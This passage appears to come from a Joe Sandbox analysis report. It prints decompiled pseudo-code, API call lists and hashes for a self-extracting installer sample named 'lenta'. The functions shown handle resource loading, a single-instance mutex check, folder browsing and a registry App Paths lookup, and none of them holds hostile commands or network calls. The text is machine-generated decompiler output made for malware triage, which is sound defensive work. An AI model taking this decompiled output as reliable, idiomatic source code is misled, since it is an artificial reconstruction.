                                                                                                                                                                                                                                                								L32:
                                                                                                                                                                                                                                                								E000244B9(0, _t64, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                								goto L33;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							_t64 =  &_v268;
                                                                                                                                                                                                                                                							if(E0002468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                                								goto L3;
                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                								_t43 = CreateMutexA(0, 1,  &_v268);
                                                                                                                                                                                                                                                								 *0x28588 = _t43;
                                                                                                                                                                                                                                                								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                                                                                                                                                                                                                									goto L12;
                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                									if(( *0x29a34 & 0x00000080) == 0) {
                                                                                                                                                                                                                                                										_t64 = 0x524;
                                                                                                                                                                                                                                                										if(E000244B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                                                                                                                                                                                                                											goto L12;
                                                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                                                											goto L11;
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                                										_t64 = 0x54b;
                                                                                                                                                                                                                                                										E000244B9(0, 0x54b, "lenta", 0, 0x10, 0);
                                                                                                                                                                                                                                                										L11:
                                                                                                                                                                                                                                                										CloseHandle( *0x28588);
                                                                                                                                                                                                                                                										 *0x29124 = 0x800700b7;
                                                                                                                                                                                                                                                										goto L33;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						L3:
                                                                                                                                                                                                                                                						_t64 = 0x4b1;
                                                                                                                                                                                                                                                						E000244B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                						 *0x29124 = 0x80070714;
                                                                                                                                                                                                                                                						L33:
                                                                                                                                                                                                                                                						_t23 = 0;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return E00026CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                                                                                                                                                                                                                			}



















                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00022eed
                                                                                                                                                                                                                                                0x00022eef
                                                                                                                                                                                                                                                0x00022eef
                                                                                                                                                                                                                                                0x00022eef
                                                                                                                                                                                                                                                0x00022eef
                                                                                                                                                                                                                                                0x00022ea2
                                                                                                                                                                                                                                                0x00022e86
                                                                                                                                                                                                                                                0x00022e88
                                                                                                                                                                                                                                                0x00022e88
                                                                                                                                                                                                                                                0x00022e43
                                                                                                                                                                                                                                                0x00022e48
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00022e48
                                                                                                                                                                                                                                                0x00022e30
                                                                                                                                                                                                                                                0x00022e30
                                                                                                                                                                                                                                                0x00022ef8
                                                                                                                                                                                                                                                0x00022f01
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00022f01
                                                                                                                                                                                                                                                0x00022d8a
                                                                                                                                                                                                                                                0x00022d8f
                                                                                                                                                                                                                                                0x00022da1
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00022da3
                                                                                                                                                                                                                                                0x00022dae
                                                                                                                                                                                                                                                0x00022db4
                                                                                                                                                                                                                                                0x00022dbb
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00022dca
                                                                                                                                                                                                                                                0x00022dd3
                                                                                                                                                                                                                                                0x00022df5
                                                                                                                                                                                                                                                0x00022e02
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00022dd5
                                                                                                                                                                                                                                                0x00022dde
                                                                                                                                                                                                                                                0x00022de3
                                                                                                                                                                                                                                                0x00022e04
                                                                                                                                                                                                                                                0x00022e0a
                                                                                                                                                                                                                                                0x00022e10
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00022e10
                                                                                                                                                                                                                                                0x00022dd3
                                                                                                                                                                                                                                                0x00022dbb
                                                                                                                                                                                                                                                0x00022da1
                                                                                                                                                                                                                                                0x00022d5b
                                                                                                                                                                                                                                                0x00022d5b
                                                                                                                                                                                                                                                0x00022d5d
                                                                                                                                                                                                                                                0x00022d69
                                                                                                                                                                                                                                                0x00022d6e
                                                                                                                                                                                                                                                0x00022f06
                                                                                                                                                                                                                                                0x00022f06
                                                                                                                                                                                                                                                0x00022f06
                                                                                                                                                                                                                                                0x00022d59
                                                                                                                                                                                                                                                0x00022f18

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00022CD9
                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00022CE9
                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00022CF9
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000246A0
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: SizeofResource.KERNEL32(00000000,00000000,?,00022D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000246A9
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000246C3
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: LoadResource.KERNEL32(00000000,00000000,?,00022D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000246CC
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: LockResource.KERNEL32(00000000,?,00022D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000246D3
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: memcpy_s.MSVCRT ref: 000246E5
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000246EF
                                                                                                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00022D34
                                                                                                                                                                                                                                                • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00022D40
                                                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00022DAE
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00022DBD
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(lenta,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00022E0A
                                                                                                                                                                                                                                                  • Part of subcall function 000244B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00024518
                                                                                                                                                                                                                                                  • Part of subcall function 000244B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00024554
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                                                                                                                                                                                                • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$lenta
                                                                                                                                                                                                                                                • API String ID: 1002816675-2993962200
                                                                                                                                                                                                                                                • Opcode ID: 90caf06005b86a23884eef31f5010d75eb67544a89344867a2ab56982580d048
                                                                                                                                                                                                                                                • Instruction ID: b68e82a08cc7a7e1da32028f22b58db7f9eaf58192e723e2c37534c230adbdab
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 90caf06005b86a23884eef31f5010d75eb67544a89344867a2ab56982580d048
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6851D370700331BBFBB0ABA0BD4ABBA26D8EB45710F218035F945D51D6DEBC88529726
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 81%
                                                                                                                                                                                                                                                			E000234F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                                                                				void* _t9;
                                                                                                                                                                                                                                                				void* _t12;
                                                                                                                                                                                                                                                				void* _t13;
                                                                                                                                                                                                                                                				void* _t17;
                                                                                                                                                                                                                                                				void* _t23;
                                                                                                                                                                                                                                                				void* _t25;
                                                                                                                                                                                                                                                				struct HWND__* _t35;
                                                                                                                                                                                                                                                				struct HWND__* _t38;
                                                                                                                                                                                                                                                				void* _t39;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t9 = _a8 - 0x10;
                                                                                                                                                                                                                                                				if(_t9 == 0) {
                                                                                                                                                                                                                                                					__eflags = 1;
                                                                                                                                                                                                                                                					L19:
                                                                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                                                                					 *0x291d8 = 1;
                                                                                                                                                                                                                                                					L20:
                                                                                                                                                                                                                                                					_push(_a4);
                                                                                                                                                                                                                                                					L21:
                                                                                                                                                                                                                                                					EndDialog();
                                                                                                                                                                                                                                                					L22:
                                                                                                                                                                                                                                                					return 1;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_push(1);
                                                                                                                                                                                                                                                				_pop(1);
                                                                                                                                                                                                                                                				_t12 = _t9 - 0xf2;
                                                                                                                                                                                                                                                				if(_t12 == 0) {
                                                                                                                                                                                                                                                					__eflags = _a12 - 0x1b;
                                                                                                                                                                                                                                                					if(_a12 != 0x1b) {
                                                                                                                                                                                                                                                						goto L22;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					goto L19;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t13 = _t12 - 0xe;
                                                                                                                                                                                                                                                				if(_t13 == 0) {
                                                                                                                                                                                                                                                					_t35 = _a4;
                                                                                                                                                                                                                                                					 *0x28584 = _t35;
                                                                                                                                                                                                                                                					E000243D0(_t35, GetDesktopWindow());
                                                                                                                                                                                                                                                					__eflags =  *0x28184; // 0x1
                                                                                                                                                                                                                                                					if(__eflags != 0) {
                                                                                                                                                                                                                                                						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                                                                                                                                                                                                                						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					SetWindowTextA(_t35, "lenta");
                                                                                                                                                                                                                                                					_t17 = CreateThread(0, 0, E00024FE0, 0, 0, 0x28798);
                                                                                                                                                                                                                                                					 *0x2879c = _t17;
                                                                                                                                                                                                                                                					__eflags = _t17;
                                                                                                                                                                                                                                                					if(_t17 != 0) {
                                                                                                                                                                                                                                                						goto L22;
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						E000244B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                						_push(0);
                                                                                                                                                                                                                                                						_push(_t35);
                                                                                                                                                                                                                                                						goto L21;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t23 = _t13 - 1;
                                                                                                                                                                                                                                                				if(_t23 == 0) {
                                                                                                                                                                                                                                                					__eflags = _a12 - 2;
                                                                                                                                                                                                                                                					if(_a12 != 2) {
                                                                                                                                                                                                                                                						goto L22;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					ResetEvent( *0x2858c);
                                                                                                                                                                                                                                                					_t38 =  *0x28584; // 0x0
                                                                                                                                                                                                                                                					_t25 = E000244B9(_t38, 0x4b2, 0x21140, 0, 0x20, 4);
                                                                                                                                                                                                                                                					__eflags = _t25 - 6;
                                                                                                                                                                                                                                                					if(_t25 == 6) {
                                                                                                                                                                                                                                                						L11:
                                                                                                                                                                                                                                                						 *0x291d8 = 1;
                                                                                                                                                                                                                                                						SetEvent( *0x2858c);
                                                                                                                                                                                                                                                						_t39 =  *0x2879c; // 0x0
                                                                                                                                                                                                                                                						E00023680(_t39);
                                                                                                                                                                                                                                                						_push(0);
                                                                                                                                                                                                                                                						goto L20;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					__eflags = _t25 - 1;
                                                                                                                                                                                                                                                					if(_t25 == 1) {
                                                                                                                                                                                                                                                						goto L11;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					SetEvent( *0x2858c);
                                                                                                                                                                                                                                                					goto L22;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				if(_t23 == 0xe90) {
                                                                                                                                                                                                                                                					TerminateThread( *0x2879c, 0);
                                                                                                                                                                                                                                                					EndDialog(_a4, _a12);
                                                                                                                                                                                                                                                					return 1;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return 0;
                                                                                                                                                                                                                                                			}












                                                                                                                                                                                                                                                0x0002359b
                                                                                                                                                                                                                                                0x000235a1
                                                                                                                                                                                                                                                0x000235a7
                                                                                                                                                                                                                                                0x000235ad
                                                                                                                                                                                                                                                0x000235b3
                                                                                                                                                                                                                                                0x000235b8
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000235b8
                                                                                                                                                                                                                                                0x00023586
                                                                                                                                                                                                                                                0x00023588
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023590
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023590
                                                                                                                                                                                                                                                0x00023524
                                                                                                                                                                                                                                                0x00023535
                                                                                                                                                                                                                                                0x00023541
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023549
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • TerminateThread.KERNEL32(00000000), ref: 00023535
                                                                                                                                                                                                                                                • EndDialog.USER32(?,?), ref: 00023541
                                                                                                                                                                                                                                                • ResetEvent.KERNEL32 ref: 0002355F
                                                                                                                                                                                                                                                • SetEvent.KERNEL32(00021140,00000000,00000020,00000004), ref: 00023590
                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 000235C7
                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,0000083B), ref: 000235F1
                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000), ref: 000235F8
                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,0000083B), ref: 00023610
                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000), ref: 00023617
                                                                                                                                                                                                                                                • SetWindowTextA.USER32(?,lenta), ref: 00023623
                                                                                                                                                                                                                                                • CreateThread.KERNEL32 ref: 00023637
                                                                                                                                                                                                                                                • EndDialog.USER32(?,00000000), ref: 00023671
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                                                                • String ID: lenta
                                                                                                                                                                                                                                                • API String ID: 2406144884-2780258678
                                                                                                                                                                                                                                                • Opcode ID: b77375022d05ae8a64b483990d51b743c4707dc4f2e822ba92ba8649a2b9ed47
                                                                                                                                                                                                                                                • Instruction ID: 5d6e9a4519aa2181396bf68f5293d454d05f618da495589decc256e7cbcbc0bc
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b77375022d05ae8a64b483990d51b743c4707dc4f2e822ba92ba8649a2b9ed47
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6831B034240321BBF7701F25BC4DE2A3AADE786B11F30C529FA06952A1CE7D8A12CB51
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 50%
                                                                                                                                                                                                                                                			E00024224(char __ecx) {
                                                                                                                                                                                                                                                				char* _v8;
                                                                                                                                                                                                                                                				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                                                                				_Unknown_base(*)()* _v16;
                                                                                                                                                                                                                                                				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                                                                				char* _v28;
                                                                                                                                                                                                                                                				intOrPtr _v32;
                                                                                                                                                                                                                                                				intOrPtr _v36;
                                                                                                                                                                                                                                                				intOrPtr _v40;
                                                                                                                                                                                                                                                				char _v44;
                                                                                                                                                                                                                                                				char _v48;
                                                                                                                                                                                                                                                				char _v52;
                                                                                                                                                                                                                                                				_Unknown_base(*)()* _t26;
                                                                                                                                                                                                                                                				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                                                                				_Unknown_base(*)()* _t29;
                                                                                                                                                                                                                                                				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                                                                				char _t42;
                                                                                                                                                                                                                                                				char* _t44;
                                                                                                                                                                                                                                                				char* _t61;
                                                                                                                                                                                                                                                				void* _t63;
                                                                                                                                                                                                                                                				char* _t65;
                                                                                                                                                                                                                                                				struct HINSTANCE__* _t66;
                                                                                                                                                                                                                                                				char _t67;
                                                                                                                                                                                                                                                				void* _t71;
                                                                                                                                                                                                                                                				char _t76;
                                                                                                                                                                                                                                                				intOrPtr _t85;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t67 = __ecx;
                                                                                                                                                                                                                                                				_t66 = LoadLibraryA("SHELL32.DLL");
                                                                                                                                                                                                                                                				if(_t66 == 0) {
                                                                                                                                                                                                                                                					_t63 = 0x4c2;
                                                                                                                                                                                                                                                					L22:
                                                                                                                                                                                                                                                					E000244B9(_t67, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                					return 0;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                                                                                                                                                                                                                				_v12 = _t26;
                                                                                                                                                                                                                                                				if(_t26 == 0) {
                                                                                                                                                                                                                                                					L20:
                                                                                                                                                                                                                                                					FreeLibrary(_t66);
                                                                                                                                                                                                                                                					_t63 = 0x4c1;
                                                                                                                                                                                                                                                					goto L22;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t28 = GetProcAddress(_t66, 0xc3);
                                                                                                                                                                                                                                                				_v20 = _t28;
                                                                                                                                                                                                                                                				if(_t28 == 0) {
                                                                                                                                                                                                                                                					goto L20;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                                                                                                                                                                                                                				_v16 = _t29;
				if(_t29 == 0) {
					goto L20;
				}
				_t76 =  *0x288c0; // 0x0
				if(_t76 != 0) {
					L10:
					 *0x287a0 = 0;
					_v52 = _t67;
					_v48 = 0;
					_v44 = 0;
					_v40 = 0x28598;
					_v36 = 1;
					_v32 = E00024200;
					_v28 = 0x288c0;
					 *0x2a288( &_v52);
					_t32 =  *_v12();
					if(_t71 != _t71) {
						asm("int 0x29");
					}
					_v12 = _t32;
					if(_t32 != 0) {
						 *0x2a288(_t32, 0x288c0);
						 *_v16();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
						if( *0x288c0 != 0) {
							E00021680(0x287a0, 0x104, 0x288c0);
						}
						 *0x2a288(_v12);
						 *_v20();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
					}
					FreeLibrary(_t66);
					_t85 =  *0x287a0; // 0x0
					return 0 | _t85 != 0x00000000;
				} else {
					GetTempPathA(0x104, 0x288c0);
					_t61 = 0x288c0;
					_t4 =  &(_t61[1]); // 0x288c1
					_t65 = _t4;
					do {
						_t42 =  *_t61;
						_t61 =  &(_t61[1]);
					} while (_t42 != 0);
					_t5 = _t61 - _t65 + 0x288c0; // 0x51181
					_t44 = CharPrevA(0x288c0, _t5);
					_v8 = _t44;
					if( *_t44 == 0x5c &&  *(CharPrevA(0x288c0, _t44)) != 0x3a) {
						 *_v8 = 0;
					}
					goto L10;
				}
			}





























                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00024236
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 0002424C
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,000000C3), ref: 00024263
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 0002427A
                                                                                                                                                                                                                                                • GetTempPathA.KERNEL32(00000104,000288C0,?,00000001), ref: 0002429F
                                                                                                                                                                                                                                                • CharPrevA.USER32(000288C0,00051181,?,00000001), ref: 000242C2
                                                                                                                                                                                                                                                • CharPrevA.USER32(000288C0,00000000,?,00000001), ref: 000242D6
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00024391
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 000243A5
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                                                                • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                                                                • API String ID: 1865808269-1731843650
                                                                                                                                                                                                                                                • Opcode ID: 0be00e9ed6e569e85582a356c65b812f80f9c814ecc9c873c340b64f7d9673c4
                                                                                                                                                                                                                                                • Instruction ID: 788940f709c6ca495beaae8f22421359f5b0419ca1653da4e181759b251d0715
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0be00e9ed6e569e85582a356c65b812f80f9c814ecc9c873c340b64f7d9673c4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EB413978B01220EFE721AF74FC84AAE7BB4EB49344F64416AE941A7251CF788D06C771
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 94%
                                                                                                                                                                                                                                                			E00022773(CHAR* __ecx, char* _a4) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                				char _v269;
                                                                                                                                                                                                                                                				CHAR* _v276;
                                                                                                                                                                                                                                                				int _v280;
                                                                                                                                                                                                                                                				void* _v284;
                                                                                                                                                                                                                                                				int _v288;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t23;
                                                                                                                                                                                                                                                				intOrPtr _t34;
                                                                                                                                                                                                                                                				int _t45;
                                                                                                                                                                                                                                                				int* _t50;
                                                                                                                                                                                                                                                				CHAR* _t52;
                                                                                                                                                                                                                                                				CHAR* _t61;
                                                                                                                                                                                                                                                				char* _t62;
                                                                                                                                                                                                                                                				int _t63;
                                                                                                                                                                                                                                                				CHAR* _t64;
                                                                                                                                                                                                                                                				signed int _t65;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t52 = __ecx;
                                                                                                                                                                                                                                                				_t23 =  *0x28004; // 0xf4950d3e
                                                                                                                                                                                                                                                				_v8 = _t23 ^ _t65;
                                                                                                                                                                                                                                                				_t62 = _a4;
                                                                                                                                                                                                                                                				_t50 = 0;
                                                                                                                                                                                                                                                				_t61 = __ecx;
                                                                                                                                                                                                                                                				_v276 = _t62;
                                                                                                                                                                                                                                                				 *((char*)(__ecx)) = 0;
                                                                                                                                                                                                                                                				if( *_t62 != 0x23) {
                                                                                                                                                                                                                                                					_t63 = 0x104;
                                                                                                                                                                                                                                                					goto L14;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					_t64 = _t62 + 1;
                                                                                                                                                                                                                                                					_v269 = CharUpperA( *_t64);
                                                                                                                                                                                                                                                					_v276 = CharNextA(CharNextA(_t64));
                                                                                                                                                                                                                                                					_t63 = 0x104;
                                                                                                                                                                                                                                                					_t34 = _v269;
                                                                                                                                                                                                                                                					if(_t34 == 0x53) {
                                                                                                                                                                                                                                                						L14:
                                                                                                                                                                                                                                                						GetSystemDirectoryA(_t61, _t63);
                                                                                                                                                                                                                                                						goto L15;
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						if(_t34 == 0x57) {
                                                                                                                                                                                                                                                							GetWindowsDirectoryA(_t61, 0x104);
                                                                                                                                                                                                                                                							goto L16;
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							_push(_t52);
                                                                                                                                                                                                                                                							_v288 = 0x104;
                                                                                                                                                                                                                                                							E00021781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                                                                                                                                                                                                                							_t59 = 0x104;
                                                                                                                                                                                                                                                							E0002658A( &_v268, 0x104, _v276);
                                                                                                                                                                                                                                                							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                                                                                                                                                                                                                								L16:
                                                                                                                                                                                                                                                								_t59 = _t63;
                                                                                                                                                                                                                                                								E0002658A(_t61, _t63, _v276);
                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                								if(RegQueryValueExA(_v284, 0x21140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                                                                                                                                                                                                                									_t45 = _v280;
                                                                                                                                                                                                                                                									if(_t45 != 2) {
                                                                                                                                                                                                                                                										L9:
                                                                                                                                                                                                                                                										if(_t45 == 1) {
                                                                                                                                                                                                                                                											goto L10;
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                                										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                                											_t45 = _v280;
                                                                                                                                                                                                                                                											goto L9;
                                                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                                                											_t59 = 0x104;
                                                                                                                                                                                                                                                											E00021680(_t61, 0x104,  &_v268);
                                                                                                                                                                                                                                                											L10:
                                                                                                                                                                                                                                                											_t50 = 1;
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								RegCloseKey(_v284);
                                                                                                                                                                                                                                                								L15:
                                                                                                                                                                                                                                                								if(_t50 == 0) {
                                                                                                                                                                                                                                                									goto L16;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return E00026CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                                                                                                                                                                                                                			}


                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CharUpperA.USER32(F4950D3E,00000000,00000000,00000000), ref: 000227A8
                                                                                                                                                                                                                                                • CharNextA.USER32(0000054D), ref: 000227B5
                                                                                                                                                                                                                                                • CharNextA.USER32(00000000), ref: 000227BC
